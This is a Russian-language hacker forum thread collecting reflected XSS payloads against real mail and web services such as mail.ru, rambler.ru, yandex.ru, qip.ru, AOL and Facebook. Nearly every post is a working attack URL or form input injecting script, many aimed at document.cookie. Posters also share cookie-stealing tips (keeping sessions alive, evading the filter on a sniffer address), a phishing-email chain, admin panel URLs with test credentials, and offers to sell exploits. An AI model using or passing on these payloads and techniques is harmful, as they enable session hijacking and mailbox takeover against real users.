Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)

Оффтоп наказуем

p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету

rambler.ru

http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E

http://top100.rambler.ru/cgi-bin/reg...p=0&reg=accept

Во всех полях вставляем "><script>alert('xss')</script>

http://goon.ru/i/phone/rus_moscow.htm

В поле Поиск по фамилии "><script>alert('xss')</script>

http://catalog.aport.ru/rus/add/AddUrl.aspx

В Адрес ресурса вставляем "><script>alert('xss')</script>

Ramber.ru

http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>alert(/TreV@N/)</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert('TreV@N')</script>&form=0&hu=1&what=0

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&what=0"><script>alert('TreV@N')</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script>alert('TreV@N')</script>&hu=1&what=0

Решил выложить XSS найденную лично мной
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

пара уязвимостей на qip:
http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E

Решил выложить XSS найденную лично мной
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
по твоему же примеру
http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS %27)%3C%2Fscript%3E

http://inbox.uz/
'><script>alert(/xss/)</script>
Уязвимые поля Логин и пароль.

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script>
http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>
http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cookie)</script>
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>
http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer')</script>

http://top100.rambler.ru/cgi-bin/register.cgi?group=49&reg=accept
в поле URL Вашей страницы:
Код:
"><script>alert(document.cookie)</script

Mail.сру
http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phrase=&proto=1&url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3 C%2Fscript%3E&title=&descr=&owner=&cperson=&email=&phone=&fax=&address=&keywords=&session_id=16073130&category_id=10993&category_name=%CC%E5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4% EE%F0%EE%E2%FC%E5&page=1&save=1

http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscr ipt%3E&password=


http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fsc ript%3E&tld=ru&x=21&y=4


http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470


http://hosting.mail.ru/
в поле логин вводим
Код:
"><script>alert('xss')</script>

http://ds.rambler.ru/index.php?p=news&pubId=00000000000000000000000000000000000000000000 0003&pubMode=%3Cscript%3Ealert()%3C/script%3E
Была активная XSS, но топик для пассивных.

Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5&form=0&hu=1&what=0

</title><script>alert('S0ulVortex')</script>

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470

уже не работают?или я не то делаю?

не работают.
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20 f02')%3C/script%3E
эта работает.

Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
http://miss.rambler.ru/srch/?sort=0&set=miss&words=%22%3E%3Cscript%3Ealert(/hacker?/)%3C/script%3E

Gala.net
http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and

ВШтате
http://vshtate.ru/reg?op=message&email=[XSS]
Но если авторизован, то не пашет :(
Короче, бесполезная :(
В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
Непохек :(

Facebook.com




http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3 C/script%3E%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E


только толку от нее нету:(

http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lmns")</script>

Мой Круг [Яндекс]

http://moikrug.ru/mates/search/all/russia/?search="/>XSS

m@il.com

http://mail01.mail.com/scripts/help/help.cgi?type=search&lang=us&string=XSS

МИРТЕСЕН

http://mirtesen.ru/groups/map#search&<script>alert(document.cookie)</script>

Прошу модераторов простить меня за то, что я отхожу от тематики почтовых серверов- но думаю, социальные сети можно приравнять к ним по важности.

Снова i.ua - на этот раз пассивка ;)

http://events.i.ua/search/?words=</title>XSS&type=text

http://mail.kinozal.tv/

http://kinozal.tv/login.php?returnto={XSS}

http://webmail.rin.ru/

http://search.rin.ru/?text={XSS}

на сайте http://www.mylivepage.ru в поле для поиска
"><script>alert('xss')</script>

META.UA (Поисковик, почта...)
http://meta.ua/ua/?rgn=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&ur

Ну и так, в придачу rutube.ru :D + раскрытие путей

http://ru tube.ru/channels.html?dir=asc&order_by=alias%22%3E%3Cimg%20src=javascript:alert( document.cookie)%3E
/var/virtual/rutube.ru/lib/Rutube/Obj/Channel.pm line 658

Mail.ru
http://hosting.mail.ru/lc.jsp?loginput=&login=123&password=%22%3E%3Cscript%3Ealert(%27Sin3v%27)%3C/script%3E

e-mail.ru

http://www.e-mail.ru/webmail.ok?cmd=calendar&month={xss}

Найдена лично мной

e-mail.ru

http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E

А это лично мной)

Работает в IE
http://sysadmin.mail.ru/pforum/profile.php?mode=viewprofile&u="><script>alert(/xss/)</script>

A.UA - унылый веб2.0 сервис (бета)
http://web20.a.ua/searchresults?query=[XSS]&stype=all
http://web20.a.ua/slovo?query=[XSS]&stype=word
http://web20.a.ua/radio?query="/>[XSS]&stype=radio

и так далее

http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=2036571"><script>alert(document.cookie)</script>

тестил в Опере

http://news.mail.ru/politics/2416467'%20onmouseover='javascript:alert(document. cookie)';a='/useit/

Для реализации надо навести мышкой на поле ввода

yandex

http://old-kubok.yandex.ru/cgi/cert.pl?s=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

http://go.mail.ru/frame.html?imgurl=xss

http://gallery.icq.com/browse.php?search=search&term=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://paint.kards.qip.ru/compose/edit/2292/?card_id=xss

phpinfo
http://fo2.rambler.ru/info.php phpinfo

хсс
http://help.rambler.ru/feedback.html?s=7715&fio=%22%3E%3Cscript%3Ealert(/2fed/)%3C/script%3E

админка
http://in.fo2.rambler.ru/administrator/index.php?

и ещё
http://ad.rambler.ru/
CLIENTS LOGIN

логин=test
пасс=test

Пассивка на mail.ru, работает онли в хроме:

http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,501,20,9&element=1&code="><script>alert(document.cookie)</script>

Пассивка на qip.ru
http://video.qip.ru/broadcast/view/?id=2172438&from="><script>alert('XSS by FatalLerr0r')</script>

Mail.ru
Работает через пост запрос в поле E-Mail
http://device.mail.ru/published/forgot.php

на yandex.ru создаем новое событие в календаре,
назваагние пишем любое , в описание <img src = http://artfile.ru/funfoto/b/v/1939_26_186_ArtFile_ru.jpg onload = alert(123);>
при просмотре события вылазит алерт"123"
p.s сори еси не туда написал )

http://g1.botva.mail.ru/registration.php?race=1<'><script>alert(document.cookie)</script>

http://translate.google.com/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums.xmbforum.com%2Ffiles.php%3Fp id%3D1361320%26aid%3D20274
http://translate.google.co.uk/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums.xmbforum.com%2Ffiles.php%3Fp id%3D1361320%26aid%3D20274
То же самое и тут (PREF TM LM S)
такая же трабла и с AOL например:
http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
просто это не те которые нужны. :( но идея с переводом документа хорошая

http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
просто это не те которые нужны. :( но идея с переводом документа хорошая

там же, куча пассивок, вывешивать не стал чтоб не флудить, но xss на каждом шагу, щя поищу активку

https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cac%3aWS%7cat%3 aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aAOL%7csnt%3aScreenName&offerId=mail-second-en-us&seamless=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E

пассивная XSS на рамблер, только что нашел

http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&uid=4513&page=200&num=5&end=080911&type=16&start=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E0&iid=27203

http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&page=206&uid=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E3&end=080911&type=16&iid=27203&start=080910

Правда в этой строке их до фига и больше...

xss mail.ru
http://wifi.mail.ru/comments.html?point_id=6568&thread="><script>alert(document.cookie)</script>
xss yandex.ru
http://images.yandex.ru/cgi-bin/customize.pl?retpath=http://yandex.ru/yandsearch?text="><script>alert(document.cookie)</script>
Сам искал! :p

Вот пару месяцев назад нашел,думал буду пользоватся,ща как-то не пригодилось так чтоб зря не пропадала берите пользуйтесь на здоровье!


http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ealert()%3C/script%3E

http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E

Mail.ru
http://kv.mail.ru/game/create_character.php?name=%22%3E%3Cscript%3Ealert% 28document.cookie%29%3C/script%3E

Работает у авторизованных.

за что вы мои XSS удаляете ?

Я их сам находил...

http://www.netman.ru/contacts.phtml в поле имя и фамилия вводим
<'<"><script>alert('XSS')</script><

http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=203657 1"><script>alert(document.cookie)</script>

пассивка на рамблере

http://id-planet.rambler.ru/main/user/blacklist
строка Найти забаненного
<img src=foo.png onerror=alert(document.cookie) />


еще одна пассивка на рамблер

http://autorambler.ru/cars/by-price/?price_from=%27%3E%3Cscript%3Ealert%28document.coo kie%29%3C%2Fscript%3E&raz=1&price_to=250000&model=303&skip=0&currency=RUR

http://torg.mail.ru/844/res/?&"><script>alert(document.cookie)</script>[sort]=2

http://torg.mail.ru/835/138479/?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Etab_id=2

первый раз сам нашел... на майле... правда с подсказкой :-)
это тоже твой xss, нашел уже с твоей подсказкой

http://torg.mail.ru/109/res/?"><script>alert(document.cookie)</script>[vendor_id][]=49

https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3v')</script>
от Sinva

подправил
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

все пассивки прикрыли... как так 0_0

а ты развивай ту. которую начал)))), вот тебе еще пассивка на майл

http://torg.mail.ru/844/res/?%27p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C%2Fscript%3E

улови какая разница между вышестоящим и этим урл ниже

http://torg.mail.ru/844/res/?p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28docu ment.cookie%29%3C%2Fscript%3E

как только догонишь, найдешь кучу пассивных xss на майле ;) не забудь убрать пробелы

мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

one.lv
http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C/script%3E

http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E :cool:

мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

Уже прикрыли)) :D

http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(document.cookie)</script>

Тока не орем))
Тут мне прислали письмо с QUELLE ( заказывал себе хрень одну ) при вводе скрипта в адресную строку я получил свои куки, но на других эта XSS не работает т.к. соответственно письмицо у них отсутствует :( ... есть какие небудь предложения по этому поводу ? Если надо выложу скрин.

inbox.lv забугорный сайтец.
http://help.inbox.lv/?language=%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44

http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44
Чтот не рабочии твои хсс :D

http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C/script%3E сообщил администрации, в общем можно сказать получил 120 $ ))

Хxsка на сайте Латвийского оператора, я им сообщил птм они мне звонили и в общем уже 3 дня прошло а залатать не могут.В общем там тоже можно считать как эмайл...
http://zeltazivtina.lv/ru/search?q=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E
Там в поиске еще активка есть)

http://story.travel.mail.ru/?mod%3C'%3C%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C=story&city_id=183615

XSS на юкозe (работает только у авторизованных админов сайта)

http://сайт на юкозе.ru/tmpls/?a=fm;n="><script>alert(document.cookie)</script>;ffilter=video;f=auth?ljcUik


Не почтовый сервер, просто не нашел куда засунуть его :rolleyes:

Пассивная xss на ngs.ru
http://expert.ngs.ru/search/?q=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28doc ument.cookie%29%3C%2Fscript%3E&t=1&r=0

http://travel.mail.ru/news/46607/?%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E&page=1

думал уже все прикрыли =))

http://content.mail.ru/help/&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E
Так же продам пассивки XSS

http://www.google.com.ua/imgres?imgurl=http://gogole.com&imgrefurl=IFRAME_HERE&h=254&w=340&sz=15D0%25B8%25D1%2582%25D0%25B1%25D1%2583%25D0%25 BB%25D1%258C%25D1%2582%25D0%25B5%25D1%2580%25D1%25 8C%25D0%25B5%25D1%2580&hl=ru&usg=__UzxB7H_92zpHrCDSG-bR5itVNg4=&ei=Lk7fSvurCI-lsAbN0_GlDg&sa=X&oi=image_result&resnum=4&ct=image&ved=0CAwQ9QEwAwIFRAME

http://calendar.yandex.ru/event-add?show_date=2009-10-22&view_type=%22%27%3E%3Cscript%3Ealert%28%27Irdis%27 %29%3C/script%3E

пассивки на рамблер

http://id-planet.rambler.ru/default/friends/search/?do_friends_search=1&firstname=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Dale rt%28%2F%D0%98%D0%BC%D1%8F%2F%29+%2F%3E+&lastname=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Daler t%28%2F%D0%A4%D0%B0%D0%BC%D0%B8%D0%BB%D0%B8%D1%8F% 2F%29+%2F%3E+&external_id=%22%3E%3Cimg+src%3Dfoo.png+onerror%3Da lert%28%2F%D0%9B%D0%BE%D0%B3%D0%B8%D0%BD%2F%29+%2F %3E+&service_id=

Работает только у авторизованных (пробелы убрать)

http://travel.mail.ru/?'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecity_from=1&countryid=1934&countryidtxt=& cityid=1500&cityidtxt=&hotelidtxt=&inp_mode=sel&ca t4=on&cat5=on&price=%3Cimg+src%3D%22javascript%3Aa lert%28document.cookie%29%22%3E&p_mode=1&p_type=2& nights1=%3Cimg+src%3D%22javascript%3Aalert%28docum ent.cookie%29%22%3E&nights2=%3Cimg+src%3D%22javasc ript%3Aalert%28document.cookie%29%22%3E&date1_d=1& date1_my=10_2009&date2_d=22&date2_my=11_2009&HB=on &STD=on&comments=%3Cimg+src%3D%22javascript%3Aaler t%28document.cookie%29%22%3E&mod=custom_order_tour

http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(document.cookie)</script>

По поводу этой штуки работает многоходовка, да и работает ли...?
Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке :) конечно если разослать миллиону товарищей то возможно эффект будет... :)

ЗЫ Совсем забыла, XSS работает если в письме есть вложение.

пассивная xss на qip.ru


работает только у авторизованных
http://file.qip.ru/account/myAccount.jsp?sId="><script>alert(document.cookie)</script>

http://file.qip.ru/account/settings.jsp?sId="><script>alert(document.cookie)</script>

http://www.yandex.ru/?add=3188&'><''>"><script>alert(/XSS/)</script>edit=1#widgetAdded

после выберам " Авто
рассчитай стоимость "

и вылазеет XSS !
Знаю что хрень но все же...

пассивка на mаil.ru, работает только у авторизованных

http://hosting.mail.ru/options.jsp?email="><script>alert(document.cookie)</script>



пассивка на mаil.ru, точку в адресе сниффера ставить в урл уникоде, иначе фильтр может заменить точку в урл на нижнее подчеркивание


http://story.travel.mail.ru/?"><script>alert(/xss/)</script>metro_id=4&mod=custom_order_tour&city_from=1&countryid=51
&countryidtxt=&cityid=-1&cityidtxt=&hotelidtxt=&inp_mode=sel&cat3=on
&cat4=on&cat5=on&price=3000&p_mode=1&p_type=2
&nights1=7&nights2=14&date1_d=1&date1_my=10_2009&
date2_d=19&date2_my=10_2009&HB=on&STD=on&comments=

http://berserk.mail.ru/index.php?'%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Eid=239

mail.ru
имя: '"/><script>alert("xss");</script>
© хз:)

http://11x11.mail.ru/xml/main/register.php?type=main/register&act=insert в логин вводим '><''>"><script>alert(/Ruslan1817/)</script>

http://11x11.mail.ru/xml/main/send.php?type=main/register&act=sendagain

тоже самое вводим )

http://email.int.ru/cod/site.php?url=http://mail.live.com&title="><script>alert();</script>

http://tv.ukr.net/rew/g/07112009/bid141/id19229/tmnow/#index.html в поле

http://kino.ukr.net/cinema/kiev/batterfljaj-de-luxe/2#board

Имя*:
E-mail:
Сообщение*: '><''>"><script>alert(document.cookie)</script>


печенюГа))

исправил на латынь !!!

http://pic.ipicture.ru/uploads/091105/ZYDf5AX74W.jpg
____________________________________________

тут есть дырка фильтре, но никак не могу доработать скрипт :( Кто поможет ?
http://job.ukr.net/resume/?AdvancedSearch=0&ShowSearchResults=1&Keywords=%&RegionId=0

тут есть дырка фильтре, но никак не могу доработать скрипт :( Кто поможет ?
http://job.ukr.net/resume/?AdvancedSearch=0&ShowSearchResults=1&Keywords=%&RegionId=0

такой вариант годится?

http://job.ukr.net/personal/resume/new/?event=Add&Photo%5Bthmb%5D=&Photo%5Bfull%5D="><img src=foo.png onerror=alert(document.cookie) />&RegionId=0&AgreementConfirm=1

http://shop.deti.mail.ru/series/13993/?order=name&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Eway=forward
есть контакт )

далее идем -->шаг 1 --> выбераем подарок--> шаг 2--> везде указываем '><''>"><script>alert(document.cookie)</script> --> шаг 3 -->
Курьер : С.-Петербург --> везде указываем '><''>"><script>alert(document.cookie)</script> --> шаг 4 --> наличными --> жмакаем далее и уау! :)

Все !

http://berserk.mail.ru/index.php?'%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Eid=239

http://berserk.mail.ru/berserk49.html?'%3E%3Cscript%3Ealert(/document.cookie/)%3C/script%3E
=))

http://soft.mail.ru/s_result_softclub.php?qs=1&words=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28 %2FXSS%2F%29%3C%2Fscript%3E

в фильтре есть дырка ... кто сможет реадизовать ?

http://story.travel.mail.ru/?city_from=1&countryid=1934&countryidtxt=%C0%E1%F5%E0%E7%E8%FF&cityid=1500&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Ecityidtxt=%C3%E0%E3%F0%FB&hotelidtxt=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Eale rt%28%2FXSS%2F%29%3C%2Fscript%3E&inp_mode=inp&price=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28 %2FXSS%2F%29%3C%2Fscript%3E&p_mode=1&p_type=1&nights1=0&nights2=0&date1_d=1&date1_my=11_2009&date2_d=8&date2_my=12_2009&comments=&mod=custom_order_tour



http://travel.mail.ru/?mod=companions&res=1&self_id=1&look_for_id=2&age_from=&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3Eage_to=&account_region_id=0&geo_id=0&days_cnt_id=0&date1=08.11.2009&date2=08.12.2009

заходим сюды ---> http://travel.mail.ru/ слева вводим в поля " Город " , " Дата приезда - Дата отъезда " '><''>"><script>alert(document.cookie)</script> ---> найти отель !
WTF? печеькО )))

http://content.mail.ru/cgi-bin/list.cgi в поле организация вставить '><''>"><script>alert(document.cookie)</script> и тут полетит печеняГа))

Все XSS тока для авторизированных!!! ( на майле 11 x 11 тока при получении письма )

http://vkrugudruzei.ru/user/advert/advert.asp?uid=7155524&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C/script%3E

http://11x11.mail.ru/xml/office/mail.php?id=18&type=office/mail&act=message&mode=1'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Кому надо еще XSS от вкругу друзей? стучим ногами в личку!


BlackSun -- тока умеешь -минусы ставить ? достал уже!

Заходим сюда ---> http://travel.mail.ru ---> выбераем вклаку взять собой ( МТС ) ---> добавить ( ставим галку ) ----> <IMG SRC="javascript:alert( document.cookie );">
0_o ... WTF?
Как было тяжко без ачата :)

http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !

http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !


так гораздо лучше
http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script>

запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....

Не знал куда можно скинуть...

http://nigma.ru/index.php?s='><''>"><script>alert(document.cookie)</script>

http://search.icq.com/search/img_results.php?q=%27%3E%3C%27%27%3E%22%3E%3Cscrip t%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&ch_id=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

Продолжаем :)

Заходим сюды ---> Зарегистрироваться и разместить рекламу ----> вводим любые данные ----> выбераем что будем продавать ----> уязвимое поле " нофелет "
'><script>alert(/XSS/)</script>

Yandex XSS: http://mail.yandex.ru/classic/abook_person?ids=1\');'>');}</script><script>alert()</script>

Вот ещё кучка XSS, которые я где-то выкладывал, что-то уже нерабочее:


http://rutube.ru/search.html?search=sum41&sort_by=1"><script>alert( 'XSS')</script>&category=1

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>

http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>

http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script>

http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>

http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://foto.rambler.ru/introduce.htm...)%3C/script%3E

http://uptime.ru/downtime.php?host_id="><script>alert()</script>"

http://www.speedguide.net/read_articles.php?id="><script>alert()</script>"

http://mail.yandex.ru/r?url=javascript:alert();

http://testoteka.ukr.net/searchresults/?target=%2522%253cscript%253ealert%28document.cook ie%29%253c%2Fscript%253e

http://search.ukr.net/yandex/search.php?search_mode=ordinal&geo=11000187&PerformSearch=1&search_query=\%27%3E%3C\%27\%27%3E\%22%3E%3Cscript %3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

http://story.travel.mail.ru/?mod=story&city_id=1543&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3E

http://finance.search.ua/?area='%3E%3C''%3E%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://tv.search.ua/?query=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%2 8document.cookie%29%3C%2Fscript%3E
http://tv.search.ua/?day='><''>"><script>alert(document.cookie)</script>

короче там все в XSS ))

http://r.mail.kz/wssx/helpinside.wssx?Language=russian'><''>"><script>alert(/Ruslan1817/)</script>

http://r.mail.kz/wssx/helpinside.wssx
уязвимые поля :
Ваше Имя Фамилия:
Ваш e-mail:



http://top.mail.tj/index.aspx?page=1&o=hits&l=50'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

http://foto.rambler.ru/introduce.html?back='%3E%3C''%3E%22%3E%3Cscript%3E alert(document.cookie)%3C/script%3E

http://planeta.rambler.ru/community/community/?tags=4049740'%3E%3C''%3E%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

Заходим сюда --->http://rasp.yandex.ru/widgets/route?station_from=9623562&station_to=9600215&thread=YUT376A_agent&dateForward=2009-12-22

Видем внизу
Текст:
-«Вылетаю!»
-«Встречайте!»
-написать свой текст <---- он нам и нужен

Вставляем туда ---> <IMG SRC=" javascript:alert('XSS');"> ----> жмем получить код ---> потом выбераем любую из них «Вылетаю!» , «Встречайте!» и снова жмем обратно ( где скрипт ) и вот она долгожданная "XSS" ))

http://travel.mail.ru/?mod=story&hotel_id=4334&'><''>"><script>alert(/Ruslan1817/)</script>

http://afisha.mail.ru/resto_list.html?advs=1&name=&%22%3E%3Cimg%20src=foo.png%20onerror=alert(documen t.cookie)%20/%3E

http://afisha.mail.ru/event.html?placetype=3&%22%3E%3Cimg%20src=foo.png%20onerror=alert(documen t.cookie)%20/%3E

http://google.ftpsearch.com.ua/index.php?hl=uk&inlang=ru&ie=UTF-8&q=related:www.owasp.org/index.php/DOM_Based_XSS&ie=windows-1251&q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Mail.ru

http://voip.agent.mail.ru/cgi-bin/mailrubin.dll/cards.html?inf="><script>alert('BY HACKED Mil-Net')</script>

Нашол сам недавно!
Пускаю по рукам :)

Rambler.ru

http://planeta.rambler.ru/community/icq/?tags=68773422%22%3E%3Cscript%3Ealert(%27BY HACKED Mil-Net%27)%3C/script%3E%3Cnoscript%3E

